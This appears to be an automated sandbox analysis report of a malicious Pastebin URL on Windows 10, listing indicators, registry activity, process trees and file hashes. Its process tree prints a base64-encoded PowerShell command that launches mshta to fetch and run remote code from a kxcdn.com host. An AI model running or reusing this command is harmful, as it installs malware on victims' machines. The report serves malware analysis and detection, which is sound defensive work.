Analysis
-
max time kernel
32s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19/08/2024, 01:28
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://pastebin.com/raw/XpGDYStK
Resource
win10v2004-20240802-en
General
-
Target
https://pastebin.com/raw/XpGDYStK
Malware Config
Extracted
https://apzzz-20c7e.kxcdn.com/apzzz-20c7e
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 45 2704 mshta.exe 47 2704 mshta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 pastebin.com 6 pastebin.com -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133685045233923777" chrome.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 940 chrome.exe 940 chrome.exe 2224 PowerShell.exe 2224 PowerShell.exe 2224 PowerShell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeDebugPrivilege 2224 PowerShell.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe Token: SeShutdownPrivilege 940 chrome.exe Token: SeCreatePagefilePrivilege 940 chrome.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe 940 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 940 wrote to memory of 3428 940 chrome.exe 84 PID 940 wrote to memory of 3428 940 chrome.exe 84 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 384 940 chrome.exe 85 PID 940 wrote to memory of 4908 940 chrome.exe 86 PID 940 wrote to memory of 4908 940 chrome.exe 86 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87 PID 940 wrote to memory of 4148 940 chrome.exe 87
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://pastebin.com/raw/XpGDYStK1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcb34bcc40,0x7ffcb34bcc4c,0x7ffcb34bcc582⤵PID:3428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1876,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1868 /prefetch:22⤵PID:384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1756,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1912 /prefetch:32⤵PID:4908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2068,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2428 /prefetch:82⤵PID:4148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3140 /prefetch:12⤵PID:1584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3180 /prefetch:12⤵PID:5116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4500,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4524 /prefetch:12⤵PID:2176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3156,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4716 /prefetch:12⤵PID:1156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3896,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3292 /prefetch:12⤵PID:1800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5076,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4920 /prefetch:82⤵PID:2296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3820,i,4523782699086065872,14280386762263212904,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4952 /prefetch:12⤵PID:8
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4160
-
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGEAcAB6AHoAegAtADIAMABjADcAZQAuAGsAeABjAGQAbgAuAGMAbwBtAC8AYQBwAHoAegB6AC0AMgAwAGMANwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://apzzz-20c7e.kxcdn.com/apzzz-20c7e2⤵
- Blocklisted process makes network request
PID:2704
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD557708c859644480baefb5013a9d2daa0
SHA1cb299c8ada673559899b1a461bd88893f2c6d38e
SHA2565d0060dc491e13aea0c0089010ede54c416f01901e5b96ba6fe444e3faa56563
SHA51280e168164f8733cd4689c1f0e6b27038a5dfd03cad4fccebb84293ce434b59f221686ba2a7667eff7652da9b74519db29e23e37258c4785c653f4dc06cd9b278
-
Filesize
168B
MD5c3001bd57b4f5ffb6569494733e8c8c8
SHA1743dac01d732757b4636f38fe414c1ea522ccfa4
SHA256dbbbbd207fb747714316942482d12d452248360c744fb6662a657aa50d9a2c95
SHA5123cb4e27ebff01a01c0a2ac740277c50a55e23f4ea16a14e6d7d7d4b412b57d6008cdabc9a4cf3338c1781ce89d5649075b7909038609a0ecf7f5da51a43eb985
-
Filesize
1KB
MD593ef23153fd382c292e51a9b24dffdfa
SHA1e46682977049d65bad0e824ddadb168fc1b53c22
SHA25675e6b2ea660f3750d1ee2c01234d557b8b03a1d8f3c3df559415aba330bf8fe8
SHA5121e1a68d1e5384033ad5ed89f970bcf5102ac5b473a7aa5c3e982273561504c3fd7c334b7e637f80e73cfc21e10f0c5a5f41856fd5702e8d40449f58b0da3340f
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
9KB
MD5cf8db433ceaf3b194aa02dd7b96edd84
SHA1845f29615545124dd9f636ace72b71aa376153d8
SHA25620c5ef88d01d140b9df5e3bbccf8f47eae144674a65cc05651aca2daaaf70683
SHA512e66982ce87818cc48dfad5d1d5e6d1af54c2837085cc06698255adfcabfd226f7a23864e2c7407ce85453e66143677c6120098f5d9645208a658a290ebb76049
-
Filesize
9KB
MD508bc4c2fc7137a3d97463ee3ff9497e0
SHA1dcc9b6e061fea1a26264fbc161c224da705e6a1e
SHA2560dac4f380297359159c5b9ac2675b0f883ad8ca074cbb66123680401f8257533
SHA512f387a38991494840754f59d33d80ac44556604804e88f9a497e4195e74b99c6f477f53051fd4e5e166fd9e709f6bc95bfb7d1c998b89e28f83c375179577beb6
-
Filesize
99KB
MD5937cf45b203b691a3e34d71b3d1eccd1
SHA158423f3c69bca34cae4e489463080a12665b5fe4
SHA256cf6a907b15a7bb95824f410096cc0740976667882099a82de0e7b5c34b2b0386
SHA51290565edc1ec093d6691c7fca430cfeca8bee4f09cf3b15c375d0f2945f66183c4bd69580b0babc8e81cc2f02df96002297f5eeb42475bc67c0553b785f1cf80a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82